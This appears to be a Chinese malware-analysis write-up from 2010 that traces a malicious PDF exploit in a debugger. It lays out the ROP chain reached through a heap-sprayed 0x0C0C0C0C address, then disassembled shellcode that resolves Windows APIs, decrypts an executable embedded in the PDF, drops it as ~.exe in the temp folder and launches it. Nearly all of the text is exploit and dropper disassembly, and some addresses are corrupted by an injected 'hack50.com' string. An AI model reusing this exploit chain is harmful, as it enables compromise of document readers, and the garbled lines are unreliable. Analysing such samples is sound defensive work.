Date:2010.11.3
Author:Cryin'
OD附加断在07002FE1位置
代码:
07002FE1 8B56 18 MOV EDX,DWORD PTR DS:[ESI+18]
07002FE4 85D2 TEST EDX,EDX
07002FE6 74 12 JE SHORT BIB.07002FFA
07002FE8 8B46 0C MOV EAX,DWORD PTR DS:[ESI+C]
07002FEB 8B4E 04 MOV ECX,DWORD PTR DS:[ESI+4]
07002FEE 50 PUSH EAX
07002FEF 51 PUSH ECX
07002FF0 56 PUSH ESI
07002FF1 FFD2 CALL EDX //EDX->BIB.070048EF
查看堆栈:
07002ff1 ffd2 call edx {BIB!BIBInitialize4+0xb3c (070048ef)}
0:000> r
eax=0c0c0c1c ebx=275505f8 ecx=cccccccc edx=070048ef esi=0c0c0c0c edi=2758c6a5
eip=07002ff1 esp=0012dd0c ebp=0012ddf0 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
BIB+0x2ff1:
07002ff1 ffd2 call edx {BIB!BIBInitialize4+0xb3c (070048ef)}
跟进去就是 的rop开始:
070048EF 94 XCHG EAX,ESP
070048F0 C3 RETN //07004919
07004919 59 POP ECX
0700491A 59 POP ECX
//BIB.070048EF
0700491B C740 0C 0100000>MOV DWORD PTR DS:[EAX+C],1
07004922 5E POP ESI
07004923 5B POP EBX
07004924 C3 RETN //07009084
07009084 C3 RETN //重复数次后跳转至07009033
07009033 C2 1800 RETN 18 //07009033
07009084 C3 RETN //重复数次后跳转07001599
07001599 5D POP EBP
//[esp]000101240 UNICODE "ramFiles=C:\Program Files\Common Files"
0700159A C3 RETN //070072F7
070072F7 58 POP EAX //00010104 UNICODE "nsole"
070072F8 C3 RETN //070015BB
070015BB 59 POP ECX //BIB.070048EF
070015BC C3 RETN //0700154D
0700154D 8908 MOV DWORD PTR DS:[EAX],ECX
0700154F C3 RETN //070015BB
070015BB 59 POP ECX
; 7FFE0300
070015BC C3 RETN //07007FB2
07007FB2 8B01 MOV EAX,DWORD PTR DS:[ECX]
; ntdll.KiFastSystemCall
07007FB4 C3 RETN //070015BB
070015BB 59 POP ECX
//00010011
070015BC C3 RETN //0700A8AC
0700A8AC 8901 MOV DWORD PTR DS:[ECX],EAX
// ntdll.KiFastSystemCall
0700A8AE 33C0 XOR EAX,EAX
0700A8B0 C3 RETN //070015BB
070015BB 59 POP ECX
// 00010100
070015BC C3 RETN //0700A8AC
0700A8AC 8901 MOV DWORD PTR DS:[ECX],EAX
0700A8AE 33C0 XOR EAX,EAX
0700A8B0 C3 RETN //070072F7
070072F7 58 POP EAX
//00010011
070072F8 C3 RETN //070052E2
070052E2 FF10 CALL DWORD PTR DS:[EAX]
//跳转7C92E510 ; ntdll.KiFastSystemCall
070052E4 C3 RETN //07005C54
7C92E510 K> 8BD4 MOV EDX,ESP
7C92E512 0F34 SYSENTER //注意
7C92E514 K> C3 RETN
07005C54 5E POP ESI
//BIB.0700156F
07005C55 83C4 14 ADD ESP,14
07005C58 C3 RETN //0700D731
0700D731 8B45 DC MOV EAX,DWORD PTR SS:[EBP-24]
0700D734 C3 RETN //070015BB
070015BB 59 POP ECX
070015BC C3 RETN //0700154D
0700154D 8908 MOV DWORD PTR DS:[EAX],ECX
0700154F C3 RETN //0700A722
0700A722 83C0 04 ADD EAX,4
0700A725 C3 RETN //070015BB
070015BB 59 POP ECX
070015BC C3 RETN //0700154D
0700154D 8908 MOV DWORD PTR DS:[EAX],ECX
0700154F C3 RETN //0700A722一直重复最后跳转至0700112F
0700112F FFD0 CALL EAX // 跳去0FF90000拷贝shellcode
07FF0021 90 NOP
07001131 59 POP ECX
07001132 C2 0400 RETN 4
下面负责拷贝shellcode:07FF0000 5A POP EDX ; BIB.07001131
07FF0001 90 NOP
07FF0002 54 PUSH ESP
07FF0003 90 NOP
07FF0004 5A POP EDX
07FF0005 EB 15 JMP SHORT 07FF001C
07FF0007 58 POP EAX
07FF0008 8B1A MOV EBX,DWORD PTR DS:[EDX]
//完成shellcode拷贝
07FF000A 8918 MOV DWORD PTR DS:[EAX],EBX
07FF000C 83C0 04 ADD EAX,4
07FF000F 83C2 04 ADD EDX,4
07FF0012 81FB 0C0C0C0C CMP EBX,0C0C0C0C
07FF0018 ^ 75 EE JNZ SHORT 07FF0008
07FF001A EB 05 JMP SHORT 07FF0021
//跳转去07FF0021执行shellcode
07FF001C E8 E6FFFFFF CALL 07FF0007
接着就开始执行shellcode:
07FF0021 90 NOP //拷贝数据的开始位置
07FF0022 90 NOP
07FF0023 90 NOP
07FF0024 90 NOP
07FF0025 E9 2F050000 JMP 07FF0559 //跳到shellcode入口,执行shellcode
07FF002A C3 RETN
07FF002B 8BC0 MOV EAX,EAX
07FF002D 33D2 XOR EDX,EDX //07FF0505调用此过程
07FF002F EB 02 JMP SHORT 07FF0033 //跳转07FF0033
07FF0031 40 INC EAX
07FF0032 42 INC EDX //edx保存长度
07FF0033 8038 00 CMP BYTE PTR DS:[EAX],0
07FF0036 ^ 75 F9 JNZ SHORT 07FF0031
07FF0038 8BC2 MOV EAX,EDX
07FF003A C3 RETN
07FF003B 8BC0 MOV EAX,EAX
07FF003D 51 PUSH ECX //07FF029E调用此过程
07FF003E 890424 MOV DWORD PTR SS:[ESP],EAX
07FF0041 EB 04 JMP SHORT 07FF0047
07FF0043 8808 MOV BYTE PTR DS:[EAX],CL
07FF0045 40 INC EAX
07FF0046 42 INC EDX
07FF0047 8A0A MOV CL,BYTE PTR DS:[EDX]
07FF0049 84C9 TEST CL,CL
07FF004B ^ 75 F6 JNZ SHORT 07FF0043
07FF004D C600 00 MOV BYTE PTR DS:[EAX],0
07FF0050 8B0424 MOV EAX,DWORD PTR SS:[ESP]
07FF0053 5A POP EDX
07FF0054 C3 RETN
07FF0055 56 PUSH ESI
//07FF035B处CALL 07FF0055到这里
07FF0056 57 PUSH EDI
07FF0057 BE 01000000 MOV ESI,1
07FF005C 3BD6 CMP EDX,ESI
07FF005E 72 08 JB SHORT 07FF0068
07FF0060 3008 XOR BYTE PTR DS:[EAX],CL
//ECX为7C80187B即CL为7B与此相与进行解密
07FF0062 46 INC ESI
07FF0063 40 INC EAX
07FF0064 3BD6 CMP EDX,ESI
07FF0066 ^ 73 F8 JNB SHORT 07FF0060
07FF0068 8BC7 MOV EAX,EDI
07FF006A 5F POP EDI
07FF006B 5E POP ESI
07FF006C C3 RETN
07FF006D 64:8B05 3000000>MOV EAX,DWORD PTR FS:[30]
//这是获取kernel32.dll基址的过程,FS:[30]显眼
07FF0074 85C0 TEST EAX,EAX
07FF0076 78 0E JS SHORT 07FF0086
07FF0078 8B40 0C MOV EAX,DWORD PTR DS:[EAX+C]
07FF007B 8B40 14 MOV EAX,DWORD PTR DS:[EAX+14]
07FF007E 8B00 MOV EAX,DWORD PTR DS:[EAX]
07FF0080 8B00 MOV EAX,DWORD PTR DS:[EAX]
07FF0082 8B40 10 MOV EAX,DWORD PTR DS:[EAX+10]
07FF0085 C3 RETN
07FF0086 8B40 34 MOV EAX,DWORD PTR DS:[EAX+34]
07FF0089 8B80 B8000000 MOV EAX,DWORD PTR DS:[EAX+B8]
07FF008F C3 RETN
07FF0090 90 NOP
07FF0091 51 PUSH ECX
07FF0092 33D2 XOR EDX,EDX
07FF0094 EB 16 JMP SHORT 07FF00AC
07FF0096 8BCA MOV ECX,EDX
07FF0098 C1E1 03 SHL ECX,3
07FF009B 83E1 FF AND ECX,FFFFFFFF
07FF009E C1EA 1D SHR EDX,1D
07FF00A1 0BCA OR ECX,EDX
07FF00A3 33D2 XOR EDX,EDX
07FF00hack50.com 8A10 MOV DL,BYTE PTR DS:[EAX]
07FF00A7 33CA XOR ECX,EDX
07FF00A9 8BD1 MOV EDX,ECX
07FF00AB 40 INC EAX
07FF00AC 8038 00 CMP BYTE PTR DS:[EAX],0
07FF00AF ^ 75 E5 JNZ SHORT 07FF0096
07FF00B1 891424 MOV DWORD PTR SS:[ESP],EDX
07FF00B4 8B0424 MOV EAX,DWORD PTR SS:[ESP]
07FF00B7 5A POP EDX
07FF00B8 C3 RETN
07FF00B9 55 PUSH EBP //这里搜索定位API地址
07FF00BA 8BEC MOV EBP,ESP
07FF00BC 83C4 E4 ADD ESP,-1C
07FF00BF 53 PUSH EBX
07FF00C0 56 PUSH ESI
07FF00C1 57 PUSH EDI
07FF00C2 8B5D 08 MOV EBX,DWORD PTR SS:[EBP+8]
07FF00C5 8B45 0C MOV EAX,DWORD PTR SS:[EBP+C]
07FF00C8 8945 FC MOV DWORD PTR SS:[EBP-4],EAX
07FF00CB 8BC3 MOV EAX,EBX
07FF00CD 66:8138 4D5A CMP WORD PTR DS:[EAX],5A4D
07FF00D2 0F85 C2000000 JNZ 07FF019A
07FF00D8 8B40 3C MOV EAX,DWORD PTR DS:[EAX+3C]
07FF00DB 03C3 ADD EAX,EBX
07FF00DD 8945 F4 MOV DWORD PTR SS:[EBP-C],EAX
07FF00E0 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C]
07FF00E3 8138 50450000 CMP DWORD PTR DS:[EAX],4550
07FF00E9 0F85 AB000000 JNZ 07FF019A
07FF00EF 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C]
07FF00F2 83C0 78 ADD EAX,78
07FF00F5 8338 00 CMP DWORD PTR DS:[EAX],0
07FF00F8 0F84 9C000000 JE 07FF019A
07FF00FE 8378 04 00 CMP DWORD PTR DS:[EAX+4],0
07FF0102 0F84 92000000 JE 07FF019A
07FF0108 8B55 F4 MOV EDX,DWORD PTR SS:[EBP-C]
07FF010B 8B52 78 MOV EDX,DWORD PTR DS:[EDX+78]
07FF010E 8BC3 MOV EAX,EBX
07FF0110 03D0 ADD EDX,EAX
07FF0112 8955 F0 MOV DWORD PTR SS:[EBP-10],EDX
07FF0115 8B55 F0 MOV EDX,DWORD PTR SS:[EBP-10]
07FF0118 837A 18 00 CMP DWORD PTR DS:[EDX+18],0
07FF011C 74 7C JE SHORT 07FF019A
07FF011E 8B55 F0 MOV EDX,DWORD PTR SS:[EBP-10]
07FF0121 8B52 20 MOV EDX,DWORD PTR DS:[EDX+20]
07FF0124 03D0 ADD EDX,EAX
07FF0126 8955 E8 MOV DWORD PTR SS:[EBP-18],EDX
07FF0129 8B55 F0 MOV EDX,DWORD PTR SS:[EBP-10]
07FF012C 8B52 24 MOV EDX,DWORD PTR DS:[EDX+24]
07FF012F 03D0 ADD EDX,EAX
07FF0131 8955 EC MOV DWORD PTR SS:[EBP-14],EDX
07FF0134 8B55 F0 MOV EDX,DWORD PTR SS:[EBP-10]
07FF0137 8B52 1C MOV EDX,DWORD PTR DS:[EDX+1C]
07FF013A 03D0 ADD EDX,EAX
07FF013C 8955 E4 MOV DWORD PTR SS:[EBP-1C],EDX
07FF013F 8B45 F0 MOV EAX,DWORD PTR SS:[EBP-10]
07FF0142 8B78 18 MOV EDI,DWORD PTR DS:[EAX+18]
07FF0145 4F DEC EDI
07FF0146 85FF TEST EDI,EDI
07FF0148 72 50 JB SHORT 07FF019A
07FF014A 47 INC EDI
07FF014B 33F6 XOR ESI,ESI
07FF014D 8B45 E8 MOV EAX,DWORD PTR SS:[EBP-18]
07FF0150 8B04B0 MOV EAX,DWORD PTR DS:[EAX+ESI*4]
07FF0153 03C3 ADD EAX,EBX
07FF0155 E8 37FFFFFF CALL 07FF0091
07FF015A 3B45 0C CMP EAX,DWORD PTR SS:[EBP+C]
07FF015D 75 37 JNZ SHORT 07FF0196
07FF015F 837D 10 00 CMP DWORD PTR SS:[EBP+10],0
07FF0163 74 1D JE SHORT 07FF0182
07FF0165 8B45 10 MOV EAX,DWORD PTR SS:[EBP+10]
07FF0168 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX
07FF016B 8B45 EC MOV EAX,DWORD PTR SS:[EBP-14]
07FF016E 0FB70470 MOVZX EAX,WORD PTR DS:[EAX+ESI*2]
07FF0172 8B55 F0 MOV EDX,DWORD PTR SS:[EBP-10]
07FF0175 0342 10 ADD EAX,DWORD PTR DS:[EDX+10]
07FF0178 50 PUSH EAX
07FF0179 53 PUSH EBX
07FF017A FF55 F8 CALL DWORD PTR SS:[EBP-8]
07FF017D 8945 FC MOV DWORD PTR SS:[EBP-4],EAX
07FF0180 EB 18 JMP SHORT 07FF019A
07FF0182 8B45 EC MOV EAX,DWORD PTR SS:[EBP-14]
07FF0185 0FB70470 MOVZX EAX,WORD PTR DS:[EAX+ESI*2]
07FF0189 8B55 E4 MOV EDX,DWORD PTR SS:[EBP-1C]
07FF018C 8B0482 MOV EAX,DWORD PTR DS:[EDX+EAX*4]
07FF018F 03C3 ADD EAX,EBX
07FF0191 8945 FC MOV DWORD PTR SS:[EBP-4],EAX
07FF0194 EB 04 JMP SHORT 07FF019A
07FF0196 46 INC ESI
07FF0197 4F DEC EDI
07FF0198 ^ 75 B3 JNZ SHORT 07FF014D
07FF019A 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]
07FF019D 5F POP EDI
07FF019E 5E POP ESI
07FF019F 5B POP EBX
07FF01A0 8BE5 MOV ESP,EBP
07FF01A2 5D POP EBP
07FF01A3 C2 0C00 RETN 0C
07FF01A6 8D40 00 LEA EAX,DWORD PTR DS:[EAX]
07FF01A9 51 PUSH ECX //07FF058D调用此过程
07FF01AA 890424 MOV DWORD PTR SS:[ESP],EAX
07FF01AD EB 0C JMP SHORT 07FF01BB
07FF01AF 40 INC EAX
07FF01B0 8038 22 CMP BYTE PTR DS:[EAX],22
07FF01B3 75 06 JNZ SHORT 07FF01BB
07FF01B5 40 INC EAX
07FF01B6 890424 MOV DWORD PTR SS:[ESP],EAX
07FF01B9 EB 05 JMP SHORT 07FF01C0
07FF01BB 8038 00 CMP BYTE PTR DS:[EAX],0
07FF01BE ^ 75 EF JNZ SHORT 07FF01AF
07FF01C0 8B0424 MOV EAX,DWORD PTR SS:[ESP]
07FF01C3 5A POP EDX
07FF01C4 C3 RETN //返回
07FF01C5 51 PUSH ECX //07FF059F调用此过程
07FF01C6 890424 MOV DWORD PTR SS:[ESP],EAX
07FF01C9 EB 09 JMP SHORT 07FF01D4
07FF01CB 80F9 22 CMP CL,22
07FF01CE 74 0A JE SHORT 07FF01DA
07FF01D0 8808 MOV BYTE PTR DS:[EAX],CL
07FF01D2 40 INC EAX
07FF01D3 42 INC EDX
07FF01D4 8A0A MOV CL,BYTE PTR DS:[EDX]
07FF01D6 84C9 TEST CL,CL
07FF01D8 ^ 75 F1 JNZ SHORT 07FF01CB
07FF01DA C600 00 MOV BYTE PTR DS:[EAX],0
07FF01DD 8B0424 MOV EAX,DWORD PTR SS:[ESP]
07FF01E0 5A POP EDX
07FF01E1 C3 RETN
07FF01E2 8D40 00 LEA EAX,DWORD PTR DS:[EAX]
07FF01E5 83C4 F8 ADD ESP,-8 //07FF0296调用此过程
07FF01E8 8D5424 04 LEA EDX,DWORD PTR SS:[ESP+4]
07FF01EC 33C9 XOR ECX,ECX
07FF01EE 890C24 MOV DWORD PTR SS:[ESP],ECX
07FF01F1 8902 MOV DWORD PTR DS:[EDX],EAX
07FF01F3 EB 02 JMP SHORT 07FF01F7
07FF01F5 FF02 INC DWORD PTR DS:[EDX]
07FF01F7 8B0A MOV ECX,DWORD PTR DS:[EDX]
07FF01F9 8039 00 CMP BYTE PTR DS:[ECX],0
07FF01FC ^ 75 F7 JNZ SHORT 07FF01F5
07FF01FE EB 13 JMP SHORT 07FF0213
07FF0200 8B0A MOV ECX,DWORD PTR DS:[EDX]
07FF0202 8039 5C CMP BYTE PTR DS:[ECX],5C
07FF0205 75 0A JNZ SHORT 07FF0211
07FF0207 8B02 MOV EAX,DWORD PTR DS:[EDX]
07FF0209 890424 MOV DWORD PTR SS:[ESP],EAX
07FF020C FF0424 INC DWORD PTR SS:[ESP]
07FF020F EB 06 JMP SHORT 07FF0217
07FF0211 FF0A DEC DWORD PTR DS:[EDX]
07FF0213 3B02 CMP EAX,DWORD PTR DS:[EDX]
07FF0215 ^ 76 E9 JBE SHORT 07FF0200
07FF0217 8B0424 MOV EAX,DWORD PTR SS:[ESP]
07FF021A 59 POP ECX
07FF021B 5A POP EDX
07FF021C C3 RETN //返回
07FF021D 53 PUSH EBX
07FF021E 56 PUSH ESI
07FF021F 57 PUSH EDI
07FF0220 51 PUSH ECX
07FF0221 8BF9 MOV EDI,ECX
07FF0223 8BD8 MOV EBX,EAX
07FF0225 6A 00 PUSH 0
07FF0227 68 80000000 PUSH 80
07FF022C 6A 02 PUSH 2
07FF022E 6A 00 PUSH 0
07FF0230 6A 02 PUSH 2
07FF0232 68 00000040 PUSH 40000000
07FF0237 52 PUSH EDX
07FF0238 FF53 12 CALL DWORD PTR DS:[EBX+12]
07FF023B 8BF0 MOV ESI,EAX
07FF023D 6A 00 PUSH 0
07FF023F 6A 00 PUSH 0
07FF0241 6A 00 PUSH 0
07FF0243 56 PUSH ESI
07FF0244 FF53 2E CALL DWORD PTR DS:[EBX+2E]
07FF0247 6A 00 PUSH 0
07FF0249 8D4424 04 LEA EAX,DWORD PTR SS:[ESP+4]
07FF024D 50 PUSH EAX
07FF024E 8BC7 MOV EAX,EDI
07FF0250 E8 D8FDFFFF CALL 07FF002D
07FF0255 50 PUSH EAX
07FF0256 57 PUSH EDI
07FF0257 56 PUSH ESI
07FF0258 FF53 16 CALL DWORD PTR DS:[EBX+16]
07FF025B 56 PUSH ESI
07FF025C FF53 22 CALL DWORD PTR DS:[EBX+22]
07FF025F 5A POP EDX
07FF0260 5F POP EDI
07FF0261 5E POP ESI
07FF0262 5B POP EBX
07FF0263 C3 RETN
07FF0264 90 NOP
07FF0265 53 PUSH EBX
//准备工作做完后,开始实现功能
07FF0266 56 PUSH ESI
07FF0267 57 PUSH EDI
07FF0268 55 PUSH EBP
07FF0269 81C4 58FCFFFF ADD ESP,-3A8
07FF026F 894C24 04 MOV DWORD PTR SS:[ESP+4],ECX
07FF0273 8BF2 MOV ESI,EDX
07FF0275 890424 MOV DWORD PTR SS:[ESP],EAX
07FF0278 8B1C24 MOV EBX,DWORD PTR SS:[ESP]
07FF027B 837C24 04 00 CMP DWORD PTR SS:[ESP+4],0
07FF0280 75 23 JNZ SHORT 07FF02hack50.com //跳转实现
07FF0282 8D4424 18 LEA EAX,DWORD PTR SS:[ESP+18]
07FF0286 50 PUSH EAX
07FF0287 68 04010000 PUSH 104
07FF028C FF53 2A CALL DWORD PTR DS:[EBX+2A]
07FF028F 8D4404 18 LEA EAX,DWORD PTR SS:[ESP+EAX+18]
07FF0293 50 PUSH EAX
07FF0294 8BC6 MOV EAX,ESI
07FF0296 E8 4AFFFFFF CALL 07FF01E5
07FF029B 8BD0 MOV EDX,EAX
07FF029D 58 POP EAX
07FF029E E8 9AFDFFFF CALL 07FF003D
07FF02A3 EB 1C JMP SHORT 07FF02C1
07FF02hack50.com 8D4424 18 LEA EAX,DWORD PTR SS:[ESP+18]
07FF02A9 50 PUSH EAX
07FF02AA 68 04010000 PUSH 104
07FF02AF FF53 2A CALL DWORD PTR DS:[EBX+2A]
//这个调用GetTempPathA函数
07FF02B2 8D4404 18 LEA EAX,DWORD PTR SS:[ESP+EAX+18]
07FF02B6 8B1424 MOV EDX,DWORD PTR SS:[ESP]
07FF02B9 83C2 69 ADD EDX,69 //添加~.exe这个名字
07FF02BC E8 7CFDFFFF CALL 07FF003D
07FF02C1 6A 00 PUSH 0
07FF02C3 68 80000000 PUSH 80
07FF02C8 6A 03 PUSH 3
07FF02CA 6A 00 PUSH 0
07FF02CC 6A 01 PUSH 1
07FF02CE 68 00000080 PUSH 80000000
07FF02D3 56 PUSH ESI
07FF02D4 FF53 12 CALL DWORD PTR DS:[EBX+12]
//调用CreatFileA,这个在shellcode里面很明显
07FF02D7 8BF0 MOV ESI,EAX //返回的是0xFFFFFFFF
07FF02D9 6A 00 PUSH 0
07FF02DB 68 80000000 PUSH 80
07FF02E0 6A 02 PUSH 2
07FF02E2 6A 00 PUSH 0
07FF02E4 6A 02 PUSH 2
07FF02E6 68 00000040 PUSH 40000000
07FF02EB 8D4424 30 LEA EAX,DWORD PTR SS:[ESP+30]
//取得~.exe的完整路径
07FF02EF 50 PUSH EAX
07FF02F0 FF53 12 CALL DWORD PTR DS:[EBX+12]
//在此调用CreatFileA,注意这里的参数不同
07FF02F3 8BE8 MOV EBP,EAX
//这里返回0x000003E4,知道是句柄就可以了!
07FF02F5 33FF XOR EDI,EDI
07FF02F7 837C24 04 01 CMP DWORD PTR SS:[ESP+4],1 //[ESP+4]为1
07FF02FC 75 0E JNZ SHORT 07FF030C //跳转未实现
07FF02FE 6A 00 PUSH 0
07FF0300 6A 00 PUSH 0
07FF0302 8B43 4E MOV EAX,DWORD PTR DS:[EBX+4E]
//此处比较重要,[EBX+4E]保存的是exe在PDF文件中的偏移地址,snowdbg优化过js喷射后释放的exe就多出了一些数据,就是因为这里的原因
07FF0305 50 PUSH EAX
07FF0306 56 PUSH ESI
07FF0307 FF53 2E CALL DWORD PTR DS:[EBX+2E]
//调用SetFilePointer,从上面就已经能猜到
07FF030A EB 0F JMP SHORT 07FF031B //直接跳转,07FF031B
07FF030C 6A 00 PUSH 0
07FF030E 6A 00 PUSH 0
07FF0310 8B43 4E MOV EAX,DWORD PTR DS:[EBX+4E]
07FF0313 0343 52 ADD EAX,DWORD PTR DS:[EBX+52]
07FF0316 50 PUSH EAX
07FF0317 56 PUSH ESI
07FF0318 FF53 2E CALL DWORD PTR DS:[EBX+2E]
07FF031B 6A 00 PUSH 0
07FF031D 6A 00 PUSH 0
07FF031F 6A 00 PUSH 0
07FF0321 55 PUSH EBP //这里EBP为000003E4
07FF0322 FF53 2E CALL DWORD PTR DS:[EBX+2E]
//又调用调用SetFilePointer
07FF0325 8B4424 04 MOV EAX,DWORD PTR SS:[ESP+4]
//[ESP+4]为0C0C07E8 00000001
07FF0329 83E8 01 SUB EAX,1
07FF032C 72 57 JB SHORT 07FF0385 //未跳转
07FF032E 0F85 BB000000 JNZ 07FF03EF //未跳转
07FF0334 6A 00 PUSH 0
07FF0336 8D4424 18 LEA EAX,DWORD PTR SS:[ESP+18]
07FF033A 50 PUSH EAX
07FF033B 68 90010000 PUSH 190
07FF0340 8D8424 24010000 LEA EAX,DWORD PTR SS:[ESP+124]
07FF0347 50 PUSH EAX //0C0C08FC
07FF0348 56 PUSH ESI //此处句柄为0xFFFFFFFF
07FF0349 FF53 1A CALL DWORD PTR DS:[EBX+1A] //ReadFile
07FF034C 8D8424 18010000 LEA EAX,DWORD PTR SS:[ESP+118]
07FF0353 8A4B 56 MOV CL,BYTE PTR DS:[EBX+56]
07FF0356 BA 90010000 MOV EDX,190
07FF035B E8 F5FCFFFF CALL 07FF0055
//转到07FF0055将读取的数据进行解密
07FF0360 6A 00 PUSH 0
07FF0362 8D4424 18 LEA EAX,DWORD PTR SS:[ESP+18]
07FF0366 50 PUSH EAX
07FF0367 68 90010000 PUSH 190
07FF036C 8D8424 24010000 LEA EAX,DWORD PTR SS:[ESP+124]
07FF0373 50 PUSH EAX
07FF0374 55 PUSH EBP
07FF0375 FF53 16 CALL DWORD PTR DS:[EBX+16] //WriteFile
07FF0378 81C7 90010000 ADD EDI,190
07FF037E 3B7B 52 CMP EDI,DWORD PTR DS:[EBX+52]
//每次读取400,一直到完成[EBX+52]即0x25800
07FF0381 ^ 72 B1 JB SHORT 07FF0334
07FF0383 EB 6A JMP SHORT 07FF03EF //跳转07FF03EF
07FF0385 6A 00 PUSH 0
07FF0387 6A 00 PUSH 0
07FF0389 68 458B0000 PUSH 8B45
07FF038E 56 PUSH ESI
07FF038F FF53 2E CALL DWORD PTR DS:[EBX+2E]
07FF0392 6A 00 PUSH 0
07FF0394 8D4424 18 LEA EAX,DWORD PTR SS:[ESP+18]
07FF0398 50 PUSH EAX
07FF0399 6A 04 PUSH 4
07FF039B 8D4424 18 LEA EAX,DWORD PTR SS:[ESP+18]
07FF039F 50 PUSH EAX
07FF03A0 56 PUSH ESI
07FF03A1 FF53 1A CALL DWORD PTR DS:[EBX+1A]
07FF03A4 6A 00 PUSH 0
07FF03A6 6A 00 PUSH 0
07FF03A8 8B43 4E MOV EAX,DWORD PTR DS:[EBX+4E]
07FF03AB 0343 52 ADD EAX,DWORD PTR DS:[EBX+52]
07FF03AE 50 PUSH EAX
07FF03AF 56 PUSH ESI
07FF03B0 FF53 2E CALL DWORD PTR DS:[EBX+2E]
07FF03B3 6A 00 PUSH 0
07FF03B5 8D4424 18 LEA EAX,DWORD PTR SS:[ESP+18]
07FF03B9 50 PUSH EAX
07FF03BA 6A 01 PUSH 1
07FF03BC 8D4424 1C LEA EAX,DWORD PTR SS:[ESP+1C]
07FF03C0 50 PUSH EAX
07FF03C1 56 PUSH ESI
07FF03C2 FF53 1A CALL DWORD PTR DS:[EBX+1A]
07FF03C5 8D4424 10 LEA EAX,DWORD PTR SS:[ESP+10]
07FF03C9 8A4B 56 MOV CL,BYTE PTR DS:[EBX+56]
07FF03CC BA 01000000 MOV EDX,1
07FF03D1 E8 7FFCFFFF CALL 07FF0055
07FF03D6 6A 00 PUSH 0
07FF03D8 8D4424 18 LEA EAX,DWORD PTR SS:[ESP+18]
07FF03DC 50 PUSH EAX
07FF03DD 6A 01 PUSH 1
07FF03DF 8D4424 1C LEA EAX,DWORD PTR SS:[ESP+1C]
07FF03E3 50 PUSH EAX
07FF03E4 55 PUSH EBP
07FF03E5 FF53 16 CALL DWORD PTR DS:[EBX+16]
07FF03E8 47 INC EDI
07FF03E9 3B7C24 0C CMP EDI,DWORD PTR SS:[ESP+C]
07FF03ED ^ 72 C4 JB SHORT 07FF03B3
07FF03EF 56 PUSH ESI
//前面esi保存的是0xFFFFFFFF句柄
07FF03F0 FF53 22 CALL DWORD PTR DS:[EBX+22] //CloseHandle
07FF03F3 55 PUSH EBP
//前面ebp保存的是000003E4句柄
07FF03F4 FF53 22 CALL DWORD PTR DS:[EBX+22]
07FF03F7 8B4424 04 MOV EAX,DWORD PTR SS:[ESP+4]
07FF03FB 83E8 01 SUB EAX,1
07FF03FE 72 0B JB SHORT 07FF040B //跳转未实现
07FF0400 0F84 90000000 JE 07FF0496 //这里跳07FF0496
07FF0406 E9 9F000000 JMP 07FF04AA
07FF040B 8D53 74 LEA EDX,DWORD PTR DS:[EBX+74]
07FF040E 8D8424 A8020000 LEA EAX,DWORD PTR SS:[ESP+2A8]
07FF0415 E8 23FCFFFF CALL 07FF003D
07FF041A 8D43 74 LEA EAX,DWORD PTR DS:[EBX+74]
07FF041D E8 0BFCFFFF CALL 07FF002D
07FF0422 8D8404 A8020000 LEA EAX,DWORD PTR SS:[ESP+EAX+2A8]
07FF0429 8D5424 18 LEA EDX,DWORD PTR SS:[ESP+18]
07FF042D E8 0BFCFFFF CALL 07FF003D
07FF0432 8D43 74 LEA EAX,DWORD PTR DS:[EBX+74]
07FF0435 E8 F3FBFFFF CALL 07FF002D
07FF043A 8BF0 MOV ESI,EAX
07FF043C 8D4424 18 LEA EAX,DWORD PTR SS:[ESP+18]
07FF0440 E8 E8FBFFFF CALL 07FF002D
07FF0445 03F0 ADD ESI,EAX
07FF0447 8D8434 A8020000 LEA EAX,DWORD PTR SS:[ESP+ESI+2A8]
07FF044E 8D93 CA000000 LEA EDX,DWORD PTR DS:[EBX+CA]
07FF0454 E8 E4FBFFFF CALL 07FF003D
07FF0459 8D4424 18 LEA EAX,DWORD PTR SS:[ESP+18]
07FF045D 50 PUSH EAX
07FF045E 68 04010000 PUSH 104
07FF0463 FF53 2A CALL DWORD PTR DS:[EBX+2A]
07FF0466 8D4404 18 LEA EAX,DWORD PTR SS:[ESP+EAX+18]
07FF046A 8D53 5F LEA EDX,DWORD PTR DS:[EBX+5F]
07FF046D E8 CBFBFFFF CALL 07FF003D
07FF0472 8D8C24 A8020000 LEA ECX,DWORD PTR SS:[ESP+2A8]
07FF0479 8D5424 18 LEA EDX,DWORD PTR SS:[ESP+18]
07FF047D 8B0424 MOV EAX,DWORD PTR SS:[ESP]
07FF0480 E8 98FDFFFF CALL 07FF021D
07FF0485 6A 00 PUSH 0
07FF0487 8D4424 1C LEA EAX,DWORD PTR SS:[ESP+1C]
07FF048B 50 PUSH EAX
07FF048C FF53 26 CALL DWORD PTR DS:[EBX+26]
07FF048F 6A 00 PUSH 0
07FF0491 FF53 36 CALL DWORD PTR DS:[EBX+36]
07FF0494 EB 14 JMP SHORT 07FF04AA
07FF0496 6A 01 PUSH 1 //
07FF0498 6A 00 PUSH 0
07FF049A 6A 00 PUSH 0
07FF049C 8D4424 24 LEA EAX,DWORD PTR SS:[ESP+24]
//eax为释放的~.exe的路径
07FF04A0 50 PUSH EAX
07FF04A1 8D43 5A LEA EAX,DWORD PTR DS:[EBX+5A] //"open"参数
07FF04A4 50 PUSH EAX
07FF04hack50.com 6A 00 PUSH 0
07FF04A7 FF53 46 CALL DWORD PTR DS:[EBX+46]
//调用ShellExcuteA运行exe
07FF04AA 8A4424 08 MOV AL,BYTE PTR SS:[ESP+8]
07FF04AE 81C4 A8030000 ADD ESP,3A8 //平衡堆栈
07FF04B4 5D POP EBP
07FF04B5 5F POP EDI
07FF04B6 5E POP ESI
07FF04B7 5B POP EBX
07FF04B8 C3 RETN //返回到07FF05B7
07FF04B9 53 PUSH EBX //07FF057E跳至此
07FF04BA 56 PUSH ESI
07FF04BB 57 PUSH EDI
07FF04BC 55 PUSH EBP
07FF04BD 83C4 F4 ADD ESP,-0C
07FF04C0 8D6C24 04 LEA EBP,DWORD PTR SS:[ESP+4]
07FF04C4 C60424 00 MOV BYTE PTR SS:[ESP],0
07FF04C8 8BD8 MOV EBX,EAX
07FF04CA E8 9EFBFFFF CALL 07FF006D
//调用过程07FF006D获取kernel32.dll基址
